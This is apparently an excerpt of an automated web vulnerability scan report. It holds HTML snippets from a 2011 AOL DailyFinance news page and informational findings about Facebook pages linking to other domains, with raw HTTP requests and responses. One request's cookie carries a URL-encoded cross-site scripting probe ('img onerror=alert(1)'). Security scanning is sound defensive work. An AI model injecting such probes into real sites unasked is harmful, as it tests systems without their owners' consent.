href="http://feedproxy.google.com/~r/247wallst_partners/~3/VyFCCMzEWhQ/"
target="_blank">
Alternative Energy Watch: European Headwinds for Solar; New Rules for Biomass Generation in Massachusetts; Bill Gates Pushes Nukes (STP, TSL, YGE, FSLR, MSFT, USU)</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://247wallst.com/" target="_blank">More from 24/7 Wall St.</a>
...[SNIP]...
<div class="genTabHidden"><img src="http://o.aolcdn.com/dynamoney/dayfin/i/1-df-loading-spinner.gif"></div>
...[SNIP]...
<span class="spot"><a href="http://www.facebook.com/DailyFinance"><img src="http://o.aolcdn.com/art/ch_pf/follow_facebook" alt="DailyFinance on Facebook" /><br />
...[SNIP]...
<span class="spot"><a href="http://twitter.com/daily_finance"><img src="http://o.aolcdn.com/art/ch_pf/follow_twitter" alt="DailyFinance on Twitter" /><br />
...[SNIP]...
<a href="/to-go/#rss-feeds"><img src="http://o.aolcdn.com/art/ch_pf/follow_rss" alt="DailyFinance RSS Feeds" /><br />
...[SNIP]...
<a href="/to-go/"><img src="http://o.aolcdn.com/art/ch_dailyfinance/togo_logo" alt="DailyFinance To Go" /><br />
...[SNIP]...
</div>
<a href="http://daol.aol.com/software/livemocha?en=cff58f1f-cade-4403-bbab-69d58ca73fc0&sp=20017294-689d-478a-bbf4-e5fbb2d3820c&fr=beef7de7-49fa-469f-9134-de66e488858d&de=e72425de-d20a-400b-8124-5f96bcecc75d&it=54e5a3eb-4001-4c2f-9a7a-41b8dfa03796 " title="Live Mocha"><img class="admodule" src="http://o.aolcdn.com/os/news/art/livemocha_ad" alt="Live Mocha" /></a>
...[SNIP]...
<div class="header">
<a href="http://www.cnnmoney.com/" target="_self" class="rsslogos rssimg1" title="CNN Money"></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Exxon Mobil wants to tell you something: It pays taxes. A lot of them.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm?eref=aol">EXXON: WE PAY PLENTY IN TAXES</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Stocks ended in the red Wednesday, as disappointing reports on jobs and the services sector weighed on investors.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm?eref=aol">Stocks stumble on economic jitters</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'General Motors has recalled 154,112 Chevrolet Cruze models in North America to inspect for proper installation of the steering wheel, the automaker said late Wednesday.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm?eref=aol">GM recalls more than 150,000 Cruzes</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.cnnmoney.com/" target="_blank"><b>
...[SNIP]...
<div class="header">
<a href="http://www.ft.com/home/us" target="_self" class="rsslogos rssimg2" title=""></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'%description.value.strip_tags().regex("/'/","&#96;")%')" onmouseout="javascript:hidePop()" href="http://www.ft.com/cms/s/0/18b96d66-76a2-11e0-bd5d-00144feabdc0.html?ftcamp=rss">Warner Music nears sale to Blavatnik</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'%description.value.strip_tags().regex("/'/","&#96;")%')" onmouseout="javascript:hidePop()" href="http://www.ft.com/cms/s/0/943fd622-76a3-11e0-bd5d-00144feabdc0.html?ftcamp=rss">News Corp in push to talk down BSkyB price</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'%description.value.strip_tags().regex("/'/","&#96;")%')" onmouseout="javascript:hidePop()" href="http://www.ft.com/cms/s/0/2dfcc23c-7697-11e0-bd5d-00144feabdc0.html?ftcamp=rss">Chrysler raising billions to repay loans</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.ft.com/home/us" target="_blank"><b>
...[SNIP]...
<div class="header">
<a href="http://www.cnbc.com/" target="_blank"><img src="http://o.aolcdn.com/art/channels/0f/06/483210ef-000fc-069da-400cb8e1" alt="CNBC" title="CNBC"/></a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.cnbc.com/" target="_blank"><b>
...[SNIP]...
<div class="header">
<a href="http://aol.smartmoney.com/" target="_self"><img src="http://o.aolcdn.com/art/channels/0f/04/46a620a1-0021f-01a0a-400cb8e1" alt="Smart Money" title="Smart Money"/></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'
           After a rough start this year, these emerging markets have come roaring back.
           ')" onmouseout="javascript:hidePop()" href="http://www.smartmoney.com/investing/stocks/5-reasons-brics-are-back-1303831340166/?cid=sm_dailyfinanceRSS">
5 Reasons BRICs Are Back (Longshot)</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'
           Communities in vacation hotspots are turning to a new tactic for wooing residents this summer.
           ')" onmouseout="javascript:hidePop()" href="http://www.smartmoney.com/personal-finance/retirement/test-drive-your-retirement-home-1304011789458/?cid=sm_dailyfinanceRSS">
Test Drive Your Retirement Home</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'
           Investors greeted lowered U.S. outlook in odd but telling ways.
           ')" onmouseout="javascript:hidePop()" href="http://www.smartmoney.com/investing/stocks/4-surprise-reactions-to-sp-treasury-slam-1303161672034/?cid=sm_dailyfinanceRSS">
4 Surprise Reactions to S&P Treasury...</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://aol.smartmoney.com/" target="_blank"><b>
...[SNIP]...
<div class="header">
<a href="http://www.foxbusiness.com/index.html" target="_self" class="rsslogos rssimg5" title="Fox Business"></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Geithner: Higher gas prices not translating into inflation')" onmouseout="javascript:hidePop()" href="http://video.foxbusiness.com/v/4677755/the-need-to-boost-oil-drilling-in-us/?playlist_id=87070">The Need to Boost Oil Drilling in U.S.</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Gerri&#96;s Two Cents: Bin Laden photos')" onmouseout="javascript:hidePop()" href="http://video.foxbusiness.com/v/4677647/white-house-announces-it-wont-release-bin-laden-pictures/?playlist_id=87069">White House Announces it Won't Release...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Back of the Envelope: Job market still in crisis')" onmouseout="javascript:hidePop()" href="http://video.foxbusiness.com/v/4677646/job-market-weighing-on-economic-recovery/?playlist_id=87069">Job Market Weighing on Economic Recovery</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.foxbusiness.com/index.html" target="_blank"><b>
...[SNIP]...
<div class="header">
<a href="http://www.engadget.com/" target="_self" class="rsslogos rssimg6" title="Engadget"></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'
It may bear closer resemblance to an upright dog than a human (check out those ears!), but POLYRO here is the least frightening example of a do-it-yourself robot that we&#96;ve seen to date. We&#96;re not sold on the humanoid&#96;s name as an acronym (oPen sOurce friendLY RObot), and the instructions and assembly photos are rather hit or miss, but this rollin&#96; rover definitely scores some points for looks. Prepare to get down and dirty with a jigsaw, drill press, and "safety equipment," before the latest addition to your family is ready to roll across the living room floor on its iRobot base. Instructables has posted a full shopping list, including a 10.1-inch netbook, ROS (Robot OS), and a Kinect. If you&#96;re feeling brave, clear some time in the schedule and space in the garage after heading over to our source link.POLYRO humanoid robot can be built by you, looks more like K-9 than C-3PO originally appeared on Engadget on Wed, 04 May 2011 20:24:00 EDT. Please see our terms for use of feeds.Permalink&nbsp;CrunchGear, Plastic Pals &nbsp;|&nbsp; Instructables &nbsp;|&nbsp;Email this&nbsp;|&nbsp;Comments')" onmouseout="javascript:hidePop()" href="http://www.engadget.com/2011/05/04/polyro-humanoid-robot-can-be-built-by-you-looks-more-like-k-9-t/">
POLYRO humanoid robot can be built by...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'

It&#96;s not often that we get word of a new gadget by way of an SEC filing, but Barnes &amp; Noble has broken with tradition with an 8-K report that reveals its intentions to introduce a new e-reader. The form, filed earlier today, says that the company "indicated it expects to make an announcement on May 24, 2011 regarding the launch of a new eReader device," and goes on to say that the form was filed "solely to satisfy the requirements of Regulation FD." Said regulation was instated back in 2000 to address concerns over insider trading. All that sounds good to us, but we wish there was a clause that required them to include a spec sheet. Considering the Nook Color just got Froyo, is it possible we&#96;ll be seeing a Honeycomb version come the 24th? It looks like we&#96;ll just have to wait and see.Barnes &amp; Noble to release new e-reader, according to securities filing originally appeared on Engadget on Wed, 04 May 2011 20:12:00 EDT. Please see our terms for use of feeds.Permalink&nbsp; &nbsp;|&nbsp; Barnes &amp; Noble &nbsp;|&nbsp;Email this&nbsp;|&nbsp;Comments')" onmouseout="javascript:hidePop()" href="http://www.engadget.com/2011/05/04/barnes-and-noble-to-release-new-e-reader-according-to-securities/">
Barnes &amp; Noble to release new...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'The FCC may be sticking with its target of 4Mbps broadband for everyone in the United States, but it looks like the CRTC thinks Canada can do one (megabit) better. The regulatory agency has just set its own target of 5Mbps download speeds and 1 Mbps upload speeds for all Canadians -- a goal that it says must be met by 2015. Those speeds, the agency notes, must be actual speeds not advertised ones, although it&#96;s not yet going as far as to declare internet access a basic service to ensure that happens. The CRTC says instead that it prefers to rely on "market forces" for the time being, rather than subsidies that would come with such a declaration. Of course, while 5Mbps is faster than the FCC&#96;s target, it&#96;s still well short of some of the more ambitious broadband goals of other countries around the world -- Finland, for instance, has already declared that 1Mbps broadband a legal right and is promising to bring 100Mbps speeds to everyone by 2015.CRTC sets target of 5Mbps broadband for all Canadians by 2015 originally appeared on Engadget on Wed, 04 May 2011 18:57:00 EDT. Please see our terms for use of feeds.Permalink&nbsp; &nbsp;|&nbsp; CBC &nbsp;|&nbsp;Email this&nbsp;|&nbsp;Comments')" onmouseout="javascript:hidePop()" href="http://www.engadget.com/2011/05/04/crtc-sets-target-of-5mbps-broadband-for-all-canadians-by-2015/">CRTC sets target of 5Mbps broadband for...</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.engadget.com/" target="_blank"><b>
...[SNIP]...
<div class="header">
<a href="http://www.huffingtonpost.com/" target="_self"><img src="http://o.aolcdn.com/art/ch_dailyfinance/huff_po_logo" alt="Huffington Post" title="Huffington Post"/></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'WASHINGTON -- Freddie Mac reported earning $676 million in the January-March quarter, the first time the bailed-out mortgage giant has posted a quarterly gain in...')" onmouseout="javascript:hidePop()" href="http://www.huffingtonpost.com/2011/05/04/freddie-mac-attributes-fi_n_857789.html">Freddie Mac Posts First Quarterly Gain...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'NEW YORK -- Noelle Aldrich never planned on moving back in with her parents after graduating from college. Aldrich will graduate from Oklahoma Baptist University...')" onmouseout="javascript:hidePop()" href="http://www.huffingtonpost.com/2011/05/04/youth-optimism-historic-low-poll_n_857750.html">Optimism In Decline: Hope For...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'WASHINGTON -- Republicans don............t even want public advocate Elizabeth Warren to head a watered-down Consumer Financial Protection Bureau. At least that............s what Democrats tried to...')" onmouseout="javascript:hidePop()" href="http://www.huffingtonpost.com/2011/05/04/gop-blocks-elizabeth-warren-cfpb_n_857780.html">GOP Blocks Bid To Make Elizabeth Warren...</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.huffingtonpost.com/" target="_blank"><b>
...[SNIP]...
<div class="header">
<a href="http://www.walletpop.com/" target="_self" class="rsslogos rssimg8" title=" WalletPop"></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Filed under: Food, Recalls, Consumer Ally, In the NewsTaylor Farms Pacific Inc. recalled grape tomatoes that were used in ready-made salads for Walmart, Safeway, Sam&#96;s Club, Albertsons and other stores because they may be contaminated with salmonella, said the U.S. Food and Drug Administration.

So far, no one has gotten sick from eating the tomatoes, the FDA said. Salmonella can cause a potentially life-threatening infection in the very young, elderly or those with weakened immune systems. Even normally healthy people can suffer from diarrhea, nausea and fever.

Taylor Farms said it was notified by its supplier, Six L&#96;s, that the grape tomatoes were part of a recall the Florida company announced because of possible salmonella contamination. Included in that recall are Cherry Berry grape tomatoes with a lot code DW-H packed in either clam-shell containers or 20-pound cardboard boxes. Those tomatoes were sold in stores and served in restaurants in Alabama, California, Florida, Georgia, Michigan, New Jersey, New York, North Carolina, Pennsylvania, South Carolina, and also Canada.Continue reading Grape Tomatoes in Ready-Made Salads Recalled Over Salmonella FearsGrape Tomatoes in Ready-Made Salads Recalled Over Salmonella Fears originally appeared on WalletPop on Wed, 04 May 2011 16:15:00 EST. Please see our terms for use of feeds.Permalink | Email this | Comments')" onmouseout="javascript:hidePop()" href="http://www.walletpop.com/2011/05/04/grape-tomatoes-in-ready-made-salads-recalled-over-salmonella-fea/">
Grape Tomatoes in Ready-Made Salads...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Amazon.com wants to get consumers in the habit of shopping its private sales.

So the online retail giant has launched a new members-only fashion site dubbed MYHABIT.com, offering up to 60% off what it calls "hand-picked selections" from "sought-after brands." With this move, Amazon.com is throwing its hat into the private or flash sale ring.

The hot, private sale websites -- the modern day, online version of the sample sale -- such as Gilt Groupe and Rue La La, aim to deliver the hottest designer looks at up to 80% off retail prices. The discounts are usually offered for just 36 to 48 hours on upscale, designer merchandise in limited quantities.Continue reading Amazon&#96;s MYHABIT.com Joins the Private Sale Website ClubAmazon&#96;s MYHABIT.com Joins the Private Sale Website Club originally appeared on WalletPop on Wed, 04 May 2011 15:00:00 EST. Please see our terms for use of feeds.Permalink | Email this | Comments')" onmouseout="javascript:hidePop()" href="http://www.walletpop.com/2011/05/04/amazons-myhabit-com-joins-the-private-sale-website-club/">
Amazon's MYHABIT.com Joins the Private...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Filed under: Recalls, Consumer Ally, In the NewsBristol-Myers Squibb recalled one lot of its blood thinner medicine Coumadin after tests showed the tablets could be more potent than the dosage, said the U.S. Food and Drug Administration (FDA).

Coumadin -- also known as warfarin sodium -- is prescribed to treat and prevent blood clots, and to lower the risk of heart attacks and strokes. However, too much of the active ingredient in the medication means there would be an increased risk of bleeding, the FDA said.

Consumers should talk to their doctors immediately if they experience any problems, including pain, swelling, headache and dizziness, unusual bruising, nosebleeds and bleeding from cuts that take a long time to stop.Continue reading One Lot of Coumadin Recalled Over Potency FearsOne Lot of Coumadin Recalled Over Potency Fears originally appeared on WalletPop on Wed, 04 May 2011 13:30:00 EST. Please see our terms for use of feeds.Permalink | Email this | Comments')" onmouseout="javascript:hidePop()" href="http://www.walletpop.com/2011/05/04/one-lot-of-coumadin-recalled-over-potency-fears/">
One Lot of Coumadin Recalled Over...</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.walletpop.com/" target="_blank"><b>
...[SNIP]...
<div class="header">

<a href="http://smallbusiness.aol.com/" target="_self" class="rsslogos rssimg9" title="AOL Small Business"></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Filed under: News, International Business, Consumer Products &amp; Services, Retail, Show BusinessBritish-based Illuminum ran out of its White Gardenia Petals fragrance within moments and now boasts a two-week international waiting list.&nbsp;Permalink&nbsp;|&nbsp;Email this&nbsp;|&nbsp;Linking&nbsp;Blogs&nbsp;|&nbsp;Comments')" onmouseout="javascript:hidePop()" href="http://smallbusiness.aol.com/2011/05/04/small-business-sells-out-of-kate-middletons-wedding-perfume/">Small Business Sells Out of Kate...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Filed under: News, Management, Human ResourcesThough they tend to be older than most of their colleagues, 61 percent of boomers say their age isn&#96;t an issue at work, and 25 percent consider their age an advantage.&nbsp;Permalink&nbsp;|&nbsp;Email this&nbsp;|&nbsp;Linking&nbsp;Blogs&nbsp;|&nbsp;Comments')" onmouseout="javascript:hidePop()" href="http://smallbusiness.aol.com/2011/05/04/baby-boomers-say-their-age-is-an-asset-in-workplace/">Baby Boomers Say Their Age is an Asset...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Filed under: Tip of the DayBe realistic with your business idea. Is this something that there is really a need for? Would you buy this product or service? When I started Mr. Handyman of Richmond 10 years ago, it was because I had trouble getting contractors to do small jobs at my house. They weren&#96;t interested in small things. There was definitely a need for this sort of service.&nbsp;Permalink&nbsp;|&nbsp;Email this&nbsp;|&nbsp;Linking&nbsp;Blogs&nbsp;|&nbsp;Comments')" onmouseout="javascript:hidePop()" href="http://smallbusiness.aol.com/2011/05/04/choose-the-right-franchise/">Choose the Right Franchise</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://smallbusiness.aol.com/" target="_blank"><b>
...[SNIP]...
<div class="header">

<a href="http://www.luxist.com/" target="_self"><img src="http://o.aolcdn.com/art/channels/0e/05/486d02a8-0024a-02bbb-400cb8e1" alt="Luxist" title="Luxist"/></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'
   
Last year my favorite new Fortis watch was the Spaceleader. The futuristic chronograph watch was designed by the Volkswagen Design team and offered as a special limited edition of 2,012 pieces. I first wrote about the Fortis Spaceleader watch here. For 2011 Fortis is offering two additional limited edition versions of the Spaceleader Chronograph. Each have white dials and are great looking in a sort of "Omega Speedmaster evolved" sense. One model has a white rubber strap and the other models has a black rubber strap. The case is in polished steel and is "wrapped" by the strap structure. Fortis and Volkswagen really hit on a good design and I think these new color variations will be just as popular as the original Spaceleader watch. Inside the watches are Swiss ETA Valjoux 7750 automatic movements. Look for these timepieces soon.

Ariel Adams publishes the wrist watch reviews site aBlogtoRead.com.

Gallery: Fortis Spaceleader Volkswagen Design White WatchFiled under: Timepieces / WatchesFortis Spaceleader Volkswagen Design White Watch originally appeared on Luxist on Wed, 04 May 2011 12:03:00 EST. Please see our terms for use of feeds.Permalink&nbsp;|&nbsp;Email this&nbsp;|&nbsp;Comments')" onmouseout="javascript:hidePop()" href="http://www.luxist.com/2011/05/04/fortis-spaceleader-volkswagen-design-white-watch/">
Fortis Spaceleader Volkswagen Design...</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.luxist.com/" target="_blank"><b>
...[SNIP]...
<div class="header">

<a href="http://realestate.aol.com/" target="_self" class="rsslogos rssimg11" title="AOL Real Estate"></a>
...[SNIP]...
<li><a href="http://realestate.aol.com/blog/2011/05/04/gossip-girls-kelly-rutherford-lists-west-hollywood-home-at-1-3/">Gossip Girl's Kelly Rutherford Lists in...</a>
...[SNIP]...
<li><a href="http://realestate.aol.com/blog/2011/05/04/natural-disasters-and-terror-plots-what-home-insurance-covers/">Natural Disasters and Terror Plots:...</a>
...[SNIP]...
<li><a href="http://realestate.aol.com/blog/2011/05/04/madonnas-childhood-home-lists-for-49k/">Madonna's Childhood Home Lists for $49K</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://realestate.aol.com/" target="_blank"><b>
...[SNIP]...
<div class="header">

<a href="http://www.aolnews.com/" target="_self" class="rsslogos rssimg12" title="AOL News"></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,' ...')" onmouseout="javascript:hidePop()" href="http://www.aolnews.com/2011/05/04/first-bin-laden-now-lex-luthor-evil-doers-return-historic-supe/">First Bin Laden, Now Lex Luthor:...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,' ...')" onmouseout="javascript:hidePop()" href="http://www.aolnews.com/2011/05/04/man-plows-into-alaskan-brewing-company-steals-beer/">Man Plows Into Alaskan Brewing Company,...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,' ...')" onmouseout="javascript:hidePop()" href="http://www.aolnews.com/2011/05/04/uma-thurman-makes-bizarre-tv-ad-for-schweppes/">Uma Thurman Makes Bizarre TV Ad for...</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.aolnews.com/" target="_blank"><b>
...[SNIP]...
<li><a href="http://smallbusiness.aol.com/">Small Business</a>
...[SNIP]...
<li><a href="http://smallbusiness.aol.com/category/starting-a-business/">Start a Business</a>
...[SNIP]...
<li><a href="http://smallbusiness.aol.com/category/advertising-and-marketing/">Business Marketing</a>
...[SNIP]...
<li><a href="http://smallbusiness.aol.com/category/money/">Business Financing</a>
...[SNIP]...
<li><a href="http://www.luxist.com/tag/hoteldeals/">Hotel Deals</a>
...[SNIP]...
<li><a href="http://www.luxist.com/tag/CelebrityRealEstate/">Celebrity Real Estate</a>
...[SNIP]...
<li><a href="http://www.luxist.com/tag/condo+auction/">Condo Auctions</a>
...[SNIP]...
<li><a href="http://realestate.aol.com/">Real Estate</a>
...[SNIP]...
<li><a href="http://www.rentedspaces.com/">Apartments</a>
...[SNIP]...
<li><a href="http://www.housingwatch.com/">Housing Trends</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/category/debt/">Debt</a></li>
       <li><a target="_blank" href="http://www.walletpop.com/category/fraud/">Fraud</a></li>
       <li><a target="_blank" href="http://www.walletpop.com/category/insurance/">Insurance</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/category/loans/">Loans</a></li>

       <li><a target="_blank" href="http://www.walletpop.com/taxes/">2010 Income Taxes</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/taxes/">Taxes</a></li>
       <li><a target="_blank" href="http://www.walletpop.com/taxes/advice/">Tax Advice</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/taxes/basics/">Tax Basics</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/taxes/forms/">Tax Forms</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/taxes/credit/">Tax Credit</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/taxes/online/">Online Tax Filing</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/college-finance/">College Finance</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/category/recalls/">Recalls</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/category/retire/">Retirement</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/">Personal Finance</a>
...[SNIP]...
<li><a target="_blank" href="http://247wallst.com/">24/7 Wall St.</a>
...[SNIP]...
<li><a href="http://www.smckids.com/">Secret Millionaires Club</a>
...[SNIP]...
<li><a target="_blank" href="http://www.luxist.com/">Luxury News</a>
...[SNIP]...
<li><a target="_blank" href="http://www.parentdish.com/">ParentDish</a>
...[SNIP]...
<li><a target="_blank" href="http://www.engadget.com/">Tech News</a>
...[SNIP]...
<li><a target="_blank" href="http://www.downloadsquad.com/">Download Squad</a>
...[SNIP]...
<li><a target="_blank" href="http://www.tuaw.com/">TUAW</a></li>
           <li><a target="_blank" href="http://aol.sportingnews.com/">Sports News</a>
...[SNIP]...
<li><a target="_blank" href="http://www.autoblog.com/">Autoblog</a>
...[SNIP]...
<li><a target="_blank" href="http://www.huffingtonpost.com/politics/">Politics News</a>
...[SNIP]...
<li><a target="_blank" href="http://noticias.aol.com/category/latino-news/">Latino News</a>
...[SNIP]...
<li><a target="_blank" href="http://music.aol.com/radioguide/bb">Radio</a>
...[SNIP]...
</a> | <a href="http://about.aol.com/aolnetwork/aol_pp" target="_blank">Privacy Policy</a> | <a href="http://about.aol.com/aolnetwork/trademarks" target="_blank">Trademarks</a>
...[SNIP]...
</a> | <a href="http://advertising.aol.com/brands/dailyfinance" target="_blank">Advertise With Us</a>
...[SNIP]...
<!-- script calls used for GCP -->


<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/df/js/jquery.globalheader-1.3.js&file=/df/js/jquery.globalsearchbox-1.3.js&file=/df/js/df-search0.6.js&file=/df/js/jslib1.5.js&file=/df/smartbox1.7.4.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/os/df/js/feeds_subscribe_en_us.js"></script>
<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/os/df/css/feeds_subscribe_en_us.css" />
<script type="text/javascript" src="http://o.aolcdn.com/os/df/js/copyRight.js"></script>
...[SNIP]...
</script>

<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js" type="text/javascript"><!--mce:0-->
...[SNIP]...

16.30. http://www.facebook.com/BPAmerica

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /BPAmerica

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/BPAmerica?v=app_116299338448715
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/fhgSeULDVSk.css
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /BPAmerica?v=app_116299338448715 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.31
Connection: close
Date: Thu, 05 May 2011 11:42:32 GMT
Content-Length: 36234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/fhgSeULDVSk.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

16.31. http://www.facebook.com/ajax/intl/language_dialog.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/5HRFtNmxswh.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
